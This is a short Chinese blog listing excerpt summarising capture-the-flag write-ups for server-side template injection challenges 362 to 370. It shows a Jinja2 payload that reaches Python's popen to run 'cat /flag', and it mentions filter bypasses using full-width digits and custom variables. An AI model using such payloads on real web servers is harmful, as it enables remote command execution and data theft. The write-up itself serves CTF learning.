2024年12月16日
SSIT362-370
摘要: 362: 过滤了数字,使用全角绕过 ?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} 363: 过滤了单双引号 使用自定义变量 把'p 阅读全文
posted @ 2024-12-16 12:55 Govced 阅读(29) 评论(0) 推荐(0)